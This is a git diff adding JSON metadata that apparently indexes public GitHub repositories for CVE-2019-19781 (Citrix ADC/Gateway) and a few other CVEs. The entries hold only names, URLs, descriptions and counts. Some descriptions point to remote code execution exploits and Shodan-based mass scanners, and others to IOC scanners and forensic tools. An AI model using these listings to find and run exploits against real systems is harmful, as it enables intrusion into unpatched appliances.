"web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 113, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 233609919, + "name": "citrix_dir_traversal_rce", + "full_name": "mekhalleh\/citrix_dir_traversal_rce", + "owner": { + "login": "mekhalleh", + "id": 5225129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5225129?v=4", + "html_url": "https:\/\/github.com\/mekhalleh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mekhalleh\/citrix_dir_traversal_rce", + "description": "The exploitation module for the CVE-2019-19781 #Shitrix (Vulnerability in Citrix Application Delivery Controller and Citrix Gateway).", + "fork": false, + "created_at": "2020-01-13T14:07:15Z", + "updated_at": "2024-08-12T19:56:34Z", + "pushed_at": "2020-01-18T12:12:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 233943421, + "name": "cve-2019-19781-web", + "full_name": "zenturacp\/cve-2019-19781-web", + "owner": { + "login": "zenturacp", + "id": 37262317, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37262317?v=4", + "html_url": "https:\/\/github.com\/zenturacp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zenturacp\/cve-2019-19781-web", + "description": null, + "fork": false, + "created_at": "2020-01-14T21:54:08Z", + "updated_at": "2020-01-28T22:56:43Z", + "pushed_at": "2020-01-28T22:56:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234053519, + "name": "CVE-2019-19781-Checker", + "full_name": "zgelici\/CVE-2019-19781-Checker", + "owner": { + "login": "zgelici", + "id": 5995033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5995033?v=4", + "html_url": "https:\/\/github.com\/zgelici", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zgelici\/CVE-2019-19781-Checker", + "description": "Check your website for CVE-2019-19781 Vulnerable", + "fork": false, + "created_at": "2020-01-15T10:15:11Z", + "updated_at": "2020-01-15T10:20:33Z", + "pushed_at": "2020-01-15T10:20:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234157094, + "name": "CVE-2019-19781_IOCs", + "full_name": "digitalshadows\/CVE-2019-19781_IOCs", + "owner": { + "login": "digitalshadows", + "id": 11042971, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11042971?v=4", + "html_url": "https:\/\/github.com\/digitalshadows", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/digitalshadows\/CVE-2019-19781_IOCs", + "description": "IOCs for CVE-2019-19781", + "fork": false, + "created_at": "2020-01-15T19:32:14Z", + "updated_at": "2020-01-15T19:37:59Z", + "pushed_at": "2020-01-15T19:36:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 234169492, + "name": "CVE-2019-19781-Forensic", + "full_name": "onSec-fr\/CVE-2019-19781-Forensic", + "owner": { + "login": "onSec-fr", + "id": 59887731, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59887731?v=4", + "html_url": "https:\/\/github.com\/onSec-fr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/onSec-fr\/CVE-2019-19781-Forensic", + "description": "Automated forensic script hunting for cve-2019-19781", + "fork": false, + "created_at": "2020-01-15T20:43:37Z", + "updated_at": "2024-08-12T19:56:40Z", + "pushed_at": "2020-02-18T17:01:13Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "citrix", + "cve-2019-19781", + "forensics-investigations" + ], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 234275841, + "name": "CVE-NetScalerFileSystemCheck", + "full_name": "DanielWep\/CVE-NetScalerFileSystemCheck", + "owner": { + "login": "DanielWep", + "id": 35801653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35801653?v=4", + "html_url": "https:\/\/github.com\/DanielWep", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DanielWep\/CVE-NetScalerFileSystemCheck", + "description": "This script checks the Citrix Netscaler if it has been compromised by CVE-2019-19781 attacks and collects all file system information", + "fork": false, + "created_at": "2020-01-16T08:52:14Z", + "updated_at": "2021-06-21T13:40:35Z", + "pushed_at": "2020-10-27T12:03:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 234291404, + "name": "Detect-CVE-2019-19781", + "full_name": "Castaldio86\/Detect-CVE-2019-19781", + "owner": { + "login": "Castaldio86", + "id": 12892740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12892740?v=4", + "html_url": "https:\/\/github.com\/Castaldio86", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Castaldio86\/Detect-CVE-2019-19781", + "description": null, + "fork": false, + "created_at": "2020-01-16T10:09:05Z", + "updated_at": "2020-01-16T10:35:07Z", + "pushed_at": "2020-01-16T10:35:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234315880, + "name": "ADC-19781", + "full_name": "j81blog\/ADC-19781", + "owner": { + "login": "j81blog", + "id": 15254164, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15254164?v=4", + "html_url": "https:\/\/github.com\/j81blog", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j81blog\/ADC-19781", + "description": "Check ADC for CVE-2019-19781", + "fork": false, + "created_at": "2020-01-16T12:33:00Z", + "updated_at": "2023-01-28T07:13:26Z", + "pushed_at": "2020-02-02T10:48:22Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 234482699, + "name": "CVE-2019-19781", + "full_name": "b510\/CVE-2019-19781", + "owner": { + "login": "b510", + "id": 47598258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47598258?v=4", + "html_url": "https:\/\/github.com\/b510", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b510\/CVE-2019-19781", + "description": "批量概念驗證用", + "fork": false, + "created_at": "2020-01-17T06:09:18Z", + "updated_at": "2020-01-17T06:23:10Z", + "pushed_at": "2020-01-17T06:23:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 234586442, + "name": "CVE-2019-19781", + "full_name": "redscan\/CVE-2019-19781", + "owner": { + "login": "redscan", + "id": 37875760, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37875760?v=4", + "html_url": "https:\/\/github.com\/redscan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redscan\/CVE-2019-19781", + "description": "CVE-2019-19781 Attack Triage Script", + "fork": false, + "created_at": "2020-01-17T16:14:30Z", + "updated_at": "2020-01-21T16:48:21Z", + "pushed_at": "2020-01-17T21:13:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 235372759, + "name": "massCitrix", + "full_name": "digitalgangst\/massCitrix", + "owner": { + "login": "digitalgangst", + "id": 23701624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23701624?v=4", + "html_url": "https:\/\/github.com\/digitalgangst", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/digitalgangst\/massCitrix", + "description": "Código desenvolvido para a verificação em massa da vulnerabilidade CVE-2019-19781 de hosts descobertos pelo Shodan. Pull requests são bem vindas. ", + "fork": false, + "created_at": "2020-01-21T15:18:08Z", + "updated_at": "2020-03-10T23:34:40Z", + "pushed_at": "2020-01-21T15:19:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 235373247, + "name": "ioc-scanner-CVE-2019-19781", + "full_name": "mandiant\/ioc-scanner-CVE-2019-19781", + "owner": { + "login": "mandiant", + "id": 331209, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/331209?v=4", + "html_url": "https:\/\/github.com\/mandiant", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mandiant\/ioc-scanner-CVE-2019-19781", + "description": "Indicator of Compromise Scanner for CVE-2019-19781", + "fork": false, + "created_at": "2020-01-21T15:20:25Z", + "updated_at": "2024-08-05T03:06:48Z", + "pushed_at": "2020-03-25T05:07:43Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 92, + "score": 0, + "subscribers_count": 14 + }, + { + "id": 235459837, + "name": "ioc-scanner-CVE-2019-19781", + "full_name": "citrix\/ioc-scanner-CVE-2019-19781", + "owner": { + "login": "citrix", + "id": 1635391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1635391?v=4", + "html_url": "https:\/\/github.com\/citrix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/citrix\/ioc-scanner-CVE-2019-19781", + "description": "Indicator of Compromise Scanner for CVE-2019-19781", + "fork": false, + "created_at": "2020-01-21T23:13:00Z", + "updated_at": "2024-09-08T15:14:46Z", + "pushed_at": "2020-03-25T16:48:30Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 58, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 235574304, + "name": "citrix-honeypot", + "full_name": "haxrob\/citrix-honeypot", + "owner": { + "login": "haxrob", + "id": 11153104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11153104?v=4", + "html_url": "https:\/\/github.com\/haxrob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haxrob\/citrix-honeypot", + "description": "Citrix ADC (NetScaler) Honeypot. Supports detection for CVE-2019-19781 and login attempts", + "fork": false, + "created_at": "2020-01-22T13:00:18Z", + "updated_at": "2024-08-12T19:56:54Z", + "pushed_at": "2020-01-23T09:10:06Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "citrix", + "citrix-adc", + "citrix-netscaler", + "citrixmash", + "cve-2019-19781", + "honeypot", + "shitrix" + ], + "visibility": "public", + "forks": 6, + "watchers": 26, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 235725853, + "name": "CitrixNetscalerAnalysis", + "full_name": "L4r1k\/CitrixNetscalerAnalysis", + "owner": { + "login": "L4r1k", + "id": 19558495, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19558495?v=4", + "html_url": "https:\/\/github.com\/L4r1k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/L4r1k\/CitrixNetscalerAnalysis", + "description": ":microscope: Jupyter notebook to help automate some of the forensic analysis related to Citrix Netscalers compromised via CVE-2019-19781", + "fork": false, + "created_at": "2020-01-23T04:59:51Z", + "updated_at": "2020-02-21T02:51:51Z", + "pushed_at": "2020-02-21T02:51:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-19781", + "dfir", + "forensic-analysis", + "log-parsing", + "shitrix" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 235755055, + "name": "CVE-2019-19781-DFIR-Notes", + "full_name": "Azeemering\/CVE-2019-19781-DFIR-Notes", + "owner": { + "login": "Azeemering", + "id": 31852867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31852867?v=4", + "html_url": "https:\/\/github.com\/Azeemering", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Azeemering\/CVE-2019-19781-DFIR-Notes", + "description": "My Citrix ADC NetScaler CVE-2019-19781 Vulnerability DFIR notes. ", + "fork": false, + "created_at": "2020-01-23T08:41:51Z", + "updated_at": "2023-05-09T10:55:31Z", + "pushed_at": "2023-05-09T10:55:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 235820941, + "name": "citrixvulncheck", + "full_name": "0xams\/citrixvulncheck", + "owner": { + "login": "0xams", + "id": 50754216, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50754216?v=4", + "html_url": "https:\/\/github.com\/0xams", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xams\/citrixvulncheck", + "description": "a script to look for CVE-2019-19781 Vulnerability within a domain and it's subdomains", + "fork": false, + "created_at": "2020-01-23T15:13:04Z", + "updated_at": "2020-01-30T05:00:45Z", + "pushed_at": "2020-01-30T05:00:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 236726768, + "name": "CVE-2019-19781", + "full_name": "r4ulcl\/CVE-2019-19781", + "owner": { + "login": "r4ulcl", + "id": 25440046, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440046?v=4", + "html_url": "https:\/\/github.com\/r4ulcl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r4ulcl\/CVE-2019-19781", + "description": "Python CVE-2019-19781 exploit", + "fork": false, + "created_at": "2020-01-28T12:09:51Z", + "updated_at": "2020-01-28T21:23:04Z", + "pushed_at": "2020-01-28T15:30:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "citrix", + "citrix-adc", + "cve-2019-19781", + "exploit", + "python3" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 245795935, + "name": "webcvescanner", + "full_name": "nmanzi\/webcvescanner", + "owner": { + "login": "nmanzi", + "id": 68373, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68373?v=4", + "html_url": "https:\/\/github.com\/nmanzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nmanzi\/webcvescanner", + "description": "Gather a list of Citrix appliances in a country \/ state pair, and check if they're vulnerable to CVE-2019-19781", + "fork": false, + "created_at": "2020-03-08T10:42:20Z", + "updated_at": "2021-11-28T06:33:59Z", + "pushed_at": "2020-03-08T11:06:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 257219340, + "name": "CVE-2019-19781POC", + "full_name": "darren646\/CVE-2019-19781POC", + "owner": { + "login": "darren646", + "id": 29980339, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29980339?v=4", + "html_url": "https:\/\/github.com\/darren646", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darren646\/CVE-2019-19781POC", + "description": null, + "fork": false, + "created_at": "2020-04-20T08:33:34Z", + "updated_at": "2020-04-20T08:33:34Z", + "pushed_at": "2020-04-20T08:33:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 263414399, + "name": "Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201", + "full_name": "Roshi99\/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201", + "owner": { + "login": "Roshi99", + "id": 55820472, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55820472?v=4", + "html_url": "https:\/\/github.com\/Roshi99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Roshi99\/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201", + "description": "This document explain Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [CVE-2019-19781]", + "fork": false, + "created_at": "2020-05-12T18:10:19Z", + "updated_at": "2020-05-12T18:10:19Z", + "pushed_at": "2020-05-12T18:10:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 266980943, + "name": "CVE-2019-19781", + "full_name": "yukar1z0e\/CVE-2019-19781", + "owner": { + "login": "yukar1z0e", + "id": 44317939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44317939?v=4", + "html_url": "https:\/\/github.com\/yukar1z0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yukar1z0e\/CVE-2019-19781", + "description": null, + "fork": false, + "created_at": "2020-05-26T08:00:22Z", + "updated_at": "2020-05-26T08:05:13Z", + "pushed_at": "2020-05-26T08:05:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 278269808, + "name": "CVE-2019-19781", + "full_name": "SharpHack\/CVE-2019-19781", + "owner": { + "login": "SharpHack", + "id": 15997329, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15997329?v=4", + "html_url": "https:\/\/github.com\/SharpHack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SharpHack\/CVE-2019-19781", + "description": null, + "fork": false, + "created_at": "2020-07-09T05:17:07Z", + "updated_at": "2020-07-09T05:17:29Z", + "pushed_at": "2020-07-09T05:17:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 278386517, + "name": "CVE-2019-19781-poc", + "full_name": "qiong-qi\/CVE-2019-19781-poc", + "owner": { + "login": "qiong-qi", + "id": 67992753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67992753?v=4", + "html_url": "https:\/\/github.com\/qiong-qi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qiong-qi\/CVE-2019-19781-poc", + "description": "修改的poc,适用于python3", + "fork": false, + "created_at": "2020-07-09T14:26:02Z", + "updated_at": "2020-07-09T14:30:49Z", + "pushed_at": "2020-07-09T14:30:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 280411552, + "name": "CVE-2019-19781-CitrixRCE", + "full_name": "w4fz5uck5\/CVE-2019-19781-CitrixRCE", + "owner": { + "login": "w4fz5uck5", + "id": 32375656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32375656?v=4", + "html_url": "https:\/\/github.com\/w4fz5uck5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w4fz5uck5\/CVE-2019-19781-CitrixRCE", + "description": "Citrix Unauthorized Remote Code Execution Attacker - CVE-2019-19781", + "fork": false, + "created_at": "2020-07-17T11:52:36Z", + "updated_at": "2024-11-07T07:17:34Z", + "pushed_at": "2023-09-12T13:10:24Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 282933539, + "name": "CVE-2019-19781", + "full_name": "andripwn\/CVE-2019-19781", + "owner": { + "login": "andripwn", + "id": 52893492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52893492?v=4", + "html_url": "https:\/\/github.com\/andripwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/andripwn\/CVE-2019-19781", + "description": "Citrix ADC scanner (CVE-2019-19781) using hosts retrieved from Shodan API.", + "fork": false, + "created_at": "2020-07-27T15:09:51Z", + "updated_at": "2020-12-13T12:56:50Z", + "pushed_at": "2020-07-27T15:10:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 283838625, + "name": "CVE-2019-19781", + "full_name": "VladRico\/CVE-2019-19781", + "owner": { + "login": "VladRico", + "id": 25226412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25226412?v=4", + "html_url": "https:\/\/github.com\/VladRico", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/VladRico\/CVE-2019-19781", + "description": "Shitrix : CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit ", + "fork": false, + "created_at": "2020-07-30T17:37:40Z", + "updated_at": "2024-08-12T20:04:17Z", + "pushed_at": "2023-10-17T23:30:10Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 355066899, + "name": "CVE-2019-19781-Citrix", + "full_name": "pwn3z\/CVE-2019-19781-Citrix", + "owner": { + "login": "pwn3z", + "id": 71440287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71440287?v=4", + "html_url": "https:\/\/github.com\/pwn3z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwn3z\/CVE-2019-19781-Citrix", + "description": null, + "fork": false, + "created_at": "2021-04-06T05:24:59Z", + "updated_at": "2024-08-12T20:11:53Z", + "pushed_at": "2021-04-06T05:25:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 400957950, + "name": "Ctirix_RCE-CVE-2019-19781", + "full_name": "Vulnmachines\/Ctirix_RCE-CVE-2019-19781", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Ctirix_RCE-CVE-2019-19781", + "description": "Citrix ADC RCE cve-2019-19781", + "fork": false, + "created_at": "2021-08-29T05:22:47Z", + "updated_at": "2024-08-12T20:15:59Z", + "pushed_at": "2022-07-26T05:19:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 410715988, + "name": "CVE-2019-19781-exploit", + "full_name": "k-fire\/CVE-2019-19781-exploit", + "owner": { + "login": "k-fire", + "id": 40354487, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40354487?v=4", + "html_url": "https:\/\/github.com\/k-fire", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k-fire\/CVE-2019-19781-exploit", + "description": "CVE-2019-19781", + "fork": false, + "created_at": "2021-09-27T02:23:02Z", + "updated_at": "2021-11-07T17:52:31Z", + "pushed_at": "2021-11-07T17:52:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 820120794, + "name": "CVE-2019-19781", + "full_name": "zerobytesecure\/CVE-2019-19781", + "owner": { + "login": "zerobytesecure", + "id": 173821960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173821960?v=4", + "html_url": "https:\/\/github.com\/zerobytesecure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zerobytesecure\/CVE-2019-19781", + "description": null, + "fork": false, + "created_at": "2024-06-25T21:02:16Z", + "updated_at": "2024-06-25T21:02:21Z", + "pushed_at": "2024-06-25T21:02:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 866620567, + "name": "-ioc-scanner-CVE-2019-19781", + "full_name": "citrixgitoff\/-ioc-scanner-CVE-2019-19781", + "owner": { + "login": "citrixgitoff", + "id": 183627851, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/183627851?v=4", + "html_url": "https:\/\/github.com\/citrixgitoff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/citrixgitoff\/-ioc-scanner-CVE-2019-19781", + "description": null, + "fork": false, + "created_at": "2024-10-02T15:26:37Z", + "updated_at": "2024-10-02T15:27:46Z", + "pushed_at": "2024-10-02T15:27:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19782.json b/2019/CVE-2019-19782.json new file mode 100644 index 0000000000..d3ab626f94 --- /dev/null +++ b/2019/CVE-2019-19782.json @@ -0,0 +1,33 @@ +[ + { + "id": 233213627, + "name": "CVE-2019-19782", + "full_name": "Underwood12\/CVE-2019-19782", + "owner": { + "login": "Underwood12", + "id": 19386296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19386296?v=4", + "html_url": "https:\/\/github.com\/Underwood12", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Underwood12\/CVE-2019-19782", + "description": null, + "fork": false, + "created_at": "2020-01-11T10:25:18Z", + "updated_at": "2020-01-11T10:25:20Z", + "pushed_at": "2020-01-10T05:12:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-19842.json b/2019/CVE-2019-19842.json new file mode 100644 index 0000000000..66d78c2e75 --- /dev/null +++ b/2019/CVE-2019-19842.json @@ -0,0 +1,33 @@ +[ + { + "id": 879791371, + "name": "CVE-2019-19842", + "full_name": "bdunlap9\/CVE-2019-19842", + "owner": { + "login": "bdunlap9", + "id": 23561759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23561759?v=4", + "html_url": "https:\/\/github.com\/bdunlap9", + 